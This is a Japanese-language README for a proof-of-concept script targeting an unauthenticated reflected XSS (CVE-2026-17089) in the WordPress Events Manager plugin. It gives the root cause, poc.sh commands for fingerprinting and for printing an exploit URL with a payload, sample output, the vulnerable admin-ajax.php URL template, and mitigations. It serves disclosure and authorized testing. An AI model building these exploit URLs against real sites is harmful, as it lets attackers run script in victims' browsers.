CVE-2026-17089 の Shell PoC。WordPress Events Manager プラグイン (<= 7.4.0.1) における未認証の反射型 XSS であり、プラグインのフィンガープリントを行い、header_format の反射をテストします。
<= 7.4.0.1 — 未認証の反射型XSS (header_format)Author: pwnVader · License: MIT (repository root)
| Component | Events Manager – Calendar, Bookings, Tickets, and more! (WordPress plugin) |
| Type | CWE-79 — Reflected Cross-Site Scripting |
| Affected | <= 7.4.0.1 |
| Fixed | later 7.4.x release (wp_kses_post() applied in EM_Events::output_grouped()) |
| CVE | CVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| PoC | poc.sh |
ショートコードのエントリポイントは header_format を wp_kses() でサニタイズしているが、未認証の
AJAX アクション search_events_grouped はそのサニタイズをバイパスし、値を HTML レスポンスに
エコーする (EM_Events::output_grouped())。リモートの未認証攻撃者は、影響を受けるサイトの
オリジン上で任意の JavaScript を実行する URL を作成でき、それを開いた任意のユーザーに対して
攻撃が成立する (UI:R)。
# Interactive menu
./poc.sh
# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com
# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"
check)== CVE-2026-17089 PoC (check) ==
target: https://example.com
[1] Plugin fingerprint (read-only)
[PASS] Events Manager assets are served (plugin installed)
[info] Stable tag: 7.1.7
[PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)
[2] Unauthenticated reflection test (read-only, benign marker)
[PASS] endpoint reflected header_format UNESCAPED (the raw is in the response)
== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).
https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>
readme.txt (Stable tag) および/またはプラグインのアセットパス
/wp-content/plugins/events-manager/includes/js/events-manager.js。admin-ajax.php?action=search_events_grouped に送信し、header_format にマーカーを設定して、
生のマークアップがレスポンスボディにエスケープされずに反射されるかどうかを確認する。header_format に
wp_kses_post() を適用し、すべての呼び出し元をカバーしている)。search_events_grouped AJAX アクションをブロックするか、WAF/アプリケーション
レベルで header_format をフィルタリングする。認可されたセキュリティテスト専用。PoC は読み取り専用 (check) であるか、URL を出力する (url)。
データは変更されない。